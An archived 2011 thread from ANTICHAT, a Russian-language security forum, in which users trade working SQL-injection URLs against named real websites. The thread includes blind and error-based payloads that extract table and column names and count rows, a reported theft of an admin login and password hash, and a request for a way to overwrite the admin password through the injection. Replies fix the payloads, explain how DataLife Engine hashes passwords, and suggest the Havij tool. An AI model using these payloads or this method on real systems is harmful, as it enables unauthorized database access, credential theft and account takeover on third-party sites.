ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.10.2011, 18:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Mr.aids
Mr.aids said:
блин у меня сейчас голова взарвётся. как так это работает.
ведь это не работает
http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31
, а в ней ascii
я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?
потому результат работы функции ascii('1')=49, а в условии у тебя ascii('1')=31, т.е. 49=31, т.к. 49 не равно 31 возвращается false и в ответ ничего не приходит!
|
|
|
|
08.10.2011, 19:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
потому результат работы функции ascii('1')=49, а в условии у тебя ascii('1')=31, т.е. 49=31, т.к. 49 не равно 31 возвращается false и в ответ ничего не приходит!
блин сильно туплю. я то подставляю 31h=49=ascii('1')
Спасибо.
начал программулину писать которая выдернет имена столбцов. Возможно я лишную работу делаю. Может кто знает софтину какую нибудь для слепых SQL. Я тут нашёл BSQL Haker но она какая то ограниченая не подходит для данного случая
|
|
|
|
09.10.2011, 02:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от z0mbie86
z0mbie86 said:
Код:
Code:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
Как мне обратиться к таблице mp_gw_auth в базе fontan?
При моей попытке вечно пишет Column count doesn't match value count at row 1 или Operand should contain 1 column(s) и др. https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat ((select(id)/**/from/**/fontan.mp_gw_auth/**/limit/**/0,1),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
|
|
|
09.10.2011, 12:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Mr.aids
Mr.aids said:
Может кто знает софтину какую нибудь для слепых SQL. Я тут нашёл BSQL Haker но она какая то ограниченая не подходит для данного случая
В Havij неплохго реализована работа с слепыми SQL. Описание есть на данном форуме вот в этой теме.
|
|
|
|
09.10.2011, 12:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
удалось мне выдернуть структуру таблиц. логин и хеш пароль админа, но вот с расшифровкой проблема
root
cb4616f2ab30f37f6facf7e61036a5ec
пытаюсь проапдейтить запись на пароль 123, но похоже что то не так вписываю, если эта запись вообще возможна тут.
пароль получается так md5(md5(salt(pass))); судя по исходникам DataLive Engine.
salt='abchefghjkmnpqrstuvwxyz0123456789';
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"abchefghjkmnpqrstuvwxyz0123456789"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]srand[/COLOR][COLOR="#007700"]( ( double )[/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]() *[/COLOR][COLOR="#0000BB"]1000000[/COLOR][COLOR="#007700"]); for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set password='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$new_pass[/COLOR][COLOR="#007700"]) ) .[/COLOR][COLOR="#DD0000"]"', allowed_ip = '' WHERE user_id='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr((UPD ATE%20dle_users%20set%20password='d9b1d7db4cd6e709 35368a1efb10e377',allowed_ip=''),1,1))='5',1,0)) |
|
|
|
09.10.2011, 14:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Mr.aids,
1. нельзя делать апдейт в подзапросе.
2. md5(md5(salt(pass))) - не так, а md5(md5($pass . $salt)), где $salt = 9 random symbols from 'abchefghjkmnpqrstuvwxyz0123456789'.
3. Хз как в дле, но судя по коду, там должна быть отдельная колонка с солью в базе.
|
|
|
|
09.10.2011, 20:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
Mr.aids,
1. нельзя делать апдейт в подзапросе.
2. md5(md5(salt(pass))) - не так, а md5(md5($pass . $salt)), где $salt = 9 random symbols from 'abchefghjkmnpqrstuvwxyz0123456789'.
3. Хз как в дле, но судя по коду, там должна быть отдельная колонка с солью в базе.
да я туплю опять жестоко. код который я привёл с md5 md5 salt это генерация нового пароля. а проверка и регистрация обычным способом идёт
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]safesql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] ) );[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]safesql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ) );[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] ); if([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DBHOST[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DBNAME[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'key'[/COLOR][COLOR="#007700"]] ) ) !=[/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]] ) die([/COLOR][COLOR="#DD0000"]'ID not valid!'[/COLOR][COLOR="#007700"]); if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[\||\'|\|\[|\]|\"|\!|\?|\$|\@|\/|\\\|\&\~\*\{\+]/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]) ) die([/COLOR][COLOR="#DD0000"]'USER not valid!'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users WHERE name = '[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#DD0000"]' AND password='[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
md5 без соли. А можно как то сделать запрос что бы сделать апдейт?
|
|
|
|
09.10.2011, 20:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
и не могу понять что с таблицей columns, судя по информации из tables таблица есть. Но все запросы терпят неудачу
http://fvsn.org/download.php?id=(18296)and%201=(if(ascii(substr((s elect%20column_name%20from%20information_schema.co lumns%20limit%206,1),2,1))=86,1,0))
перебираю все символы нет реакции
|
|
|
|
09.10.2011, 22:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Mr.aids
Mr.aids said:
и не могу понять что с таблицей columns, судя по информации из tables таблица есть. Но все запросы терпят неудачу
http://fvsn.org/download.php?id=(18296)and%201=(if(ascii(substr((s elect%20column_name%20from%20information_schema.co lumns%20limit%206,1),2,1))=86,1,0))
перебираю все символы нет реакции
С чего ты взял что второй символ запроса select column_name from information_schema.columns limit 6,1 равен букве V?
Настоятельно рекомендую тебе прочесть статью: /thread43966.html
И если в следующий раз думай прежде чем задать вопрос, иначе сообщение будет ликвидироваться.
|
|
|
|
10.10.2011, 08:54
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от OxoTnik
OxoTnik said:
Всем светлым головам привет!
Столкнулся с такой проблемой
Есть сайт 4 мускул
Уверен что там есть эти колонки.
как вывести данные?
Для начала проверил бы, а есть ли вообще данные в этой таблице ??
Код:
Code:
http://www.teamarena.ru/demo/-9999999+or+ascii(substring((SELECT+count(*)+FROM+cup.user),1,1))=49 FALSE
http://www.teamarena.ru/demo/-9999999+or+ascii(substring((SELECT+count(*)+FROM+cup.user),1,1))=48 TRUE
В таблице cup.user 0 записей как видно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
